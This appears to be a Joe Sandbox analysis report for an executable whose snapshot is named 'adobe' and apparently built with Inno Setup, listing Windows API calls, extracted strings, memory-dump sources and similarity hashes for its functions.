Uniqueness Score: -1.00%

APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457320
• GetExitCodeProcess.KERNEL32(?,00496E0E), ref: 00457341
• CloseHandle.KERNEL32(?,00457374,?,?,00457B8F,00000000,00000000), ref: 00457367
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-3235461205
• Opcode ID: 6eefd9f50476b9317959784dc28f8f231be967919d8c48666081bcd3cabceedf
• Instruction ID: 4a074e93e4ab88470b46d36102555543fa5a99f4012040e6d914a5d3a66b8e8b
• Opcode Fuzzy Hash: 6eefd9f50476b9317959784dc28f8f231be967919d8c48666081bcd3cabceedf
• Instruction Fuzzy Hash: B401A230608204AFDB11EF999D42E5E73E8EB49724F2041B7BC10D73D2D67CAD04E658
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534CF
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• MoveFileA.KERNEL32(00000000,00000000), ref: 004534F4
  • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: (rI$DeleteFile$MoveFile
• API String ID: 3024442154-2098259748
• Opcode ID: 5d0c1779b8e16b3ae36e0bebb0f41303659532bd6b8dc4fd8825605b63ba4c8e
• Instruction ID: 70eb457cff55a4d5f9d98fb722c0821592184d165c2451b26ab6992e5a9cd8f1
• Opcode Fuzzy Hash: 5d0c1779b8e16b3ae36e0bebb0f41303659532bd6b8dc4fd8825605b63ba4c8e
• Instruction Fuzzy Hash: 32F086706041046AEB01FFA5D95266E67ECDB4434BFA0443BF800B76C3DA3C9E09893D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
• InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
• Opcode ID: cdc7b060e8b26ef6bba2eda7f6a702c2b70b9cef93cd34ce0534829a320e8a46
• Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
• Opcode Fuzzy Hash: cdc7b060e8b26ef6bba2eda7f6a702c2b70b9cef93cd34ce0534829a320e8a46
• Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 004767B8
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004768AF,0049B050,00000000), ref: 004767CB
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004767D1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
• Opcode ID: 253f29cc5d34b4f0098bf6cec3cd54211177093b5d28b857057e13c9eed5381f
• Instruction ID: 6e27a2cfa281462b526e1be0b42828d7d17b2ea8f6af052b61cc0337a2e5f352
• Opcode Fuzzy Hash: 253f29cc5d34b4f0098bf6cec3cd54211177093b5d28b857057e13c9eed5381f
• Instruction Fuzzy Hash: BBD0A7B0201B0066DD1473F14D87D9B634ECD84799711883B7418E2186CA3CE808497D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004972BA), ref: 0044EFD3
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: NotifyWinEvent$dD$user32.dll
• API String ID: 1646373207-754903266
• Opcode ID: da7dd1d7eeb1acca88fabe30517a1b31fd1e0b0306d4e26cdddca2e5d0ffe6ec
• Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
• Opcode Fuzzy Hash: da7dd1d7eeb1acca88fabe30517a1b31fd1e0b0306d4e26cdddca2e5d0ffe6ec
• Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
Uniqueness

Uniqueness Score: -1.00%

APIs
• BeginPaint.USER32(00000000,?), ref: 00416C62
• SaveDC.GDI32(?), ref: 00416C93
• ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
• RestoreDC.GDI32(?,?), ref: 00416D1B
• EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3808407030-0
                                                                                                                                                          • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                                                                          • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                                                                                          • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                                                                          • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                          • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                                                                                          • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                          • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                          • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                                                                                          • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                                                                                          • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                                                                                          • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                                                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4277397052-0
                                                                                                                                                          • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                          • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                                                                                          • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                          • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0045C86C: SetLastError.KERNEL32(00000057,00000000,0045C938,?,?,?,?,00000000), ref: 0045C8D7
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 00472759
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 0047276F
                                                                                                                                                          Strings
                                                                                                                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 00472763
                                                                                                                                                          • Setting permissions on registry key: %s\%s, xrefs: 0047271E
                                                                                                                                                          • Failed to set permissions on registry key (%d)., xrefs: 00472780
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                                                                          • API String ID: 1452528299-4018462623
                                                                                                                                                          • Opcode ID: ea809eea215e45988c37a6150222403cec11ab8ce7110ab5d38e529414a03156
                                                                                                                                                          • Instruction ID: b8443cf5e2643b11ee943be54b693f5644c44bad37c33e6ad4d9b43925b6925c
                                                                                                                                                          • Opcode Fuzzy Hash: ea809eea215e45988c37a6150222403cec11ab8ce7110ab5d38e529414a03156
                                                                                                                                                          • Instruction Fuzzy Hash: 7021C870A042045FCB04DBAEDA817EEBBE4EF49314F50417BF408E7392C7B859058B69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 262959230-0
                                                                                                                                                          • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                                                                          • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
Uniqueness

Uniqueness Score: -1.00%

APIs
• 73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
• 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
• 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
• 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
• 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: A122A18830$A480
• String ID:
• API String ID: 3325508737-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
Strings
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetRectEmpty.USER32(?), ref: 0044C8A2
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
Strings
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
Uniqueness

Uniqueness Score: -1.00%

APIs
• 73A1A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
• SelectObject.GDI32(?,00000000), ref: 0042EE35
• 73A1A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
Strings
Similarity
• API ID: A480A570CreateFontIndirectObjectSelect
• String ID: ...\
• API String ID: 2998766281-983595016
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045301B
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045302B
Strings
Similarity
• API ID: CloseCreateFileHandle
• String ID: (rI$.tmp
• API String ID: 3498533004-3138636223
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455F48
• RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455F75
Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                                                          • API String ID: 1312246647-2435364021
                                                                                                                                                          • Opcode ID: 8db503a5e71761849dda00c4474342a384a20319f516bd6a6f52dcc7b471ddee
                                                                                                                                                          • Instruction ID: 9dd964af6d171c160354b7431e2e7bf6b237ee99b3e18c78647d6df6d6a6389e
                                                                                                                                                          • Opcode Fuzzy Hash: 8db503a5e71761849dda00c4474342a384a20319f516bd6a6f52dcc7b471ddee
                                                                                                                                                          • Instruction Fuzzy Hash: 9B119632B00A04BFDB11DFA6CD6196EB7ADEB89715F10847AFC04D3652D6789904CB54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456466
                                                                                                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456503
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to create DebugClientWnd, xrefs: 004564CC
                                                                                                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456492
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                                          • API String ID: 3850602802-3720027226
                                                                                                                                                          • Opcode ID: de1203681df2f13ee3edcb29637d6c05e1bb22d995aac381a7a8ad744fd246b2
                                                                                                                                                          • Instruction ID: d6336fda61e0ff9d2ebfbe9a4145e2f7bc73dda7394494d671267afbd3e9fcca
                                                                                                                                                          • Opcode Fuzzy Hash: de1203681df2f13ee3edcb29637d6c05e1bb22d995aac381a7a8ad744fd246b2
                                                                                                                                                          • Instruction Fuzzy Hash: 6F11E3B06042506FD310AB299C41B5B7BA89B5630DF45443BF984DF387D3798818CBAE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                          • GetFocus.USER32 ref: 00477373
                                                                                                                                                          • GetKeyState.USER32(0000007A), ref: 00477385
                                                                                                                                                          • WaitMessage.USER32(?,00000000,004773AC,?,00000000,004773D3,?,?,00000001,00000000,?,?,?,0047EBCA,00000000,0047FACB), ref: 0047738F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
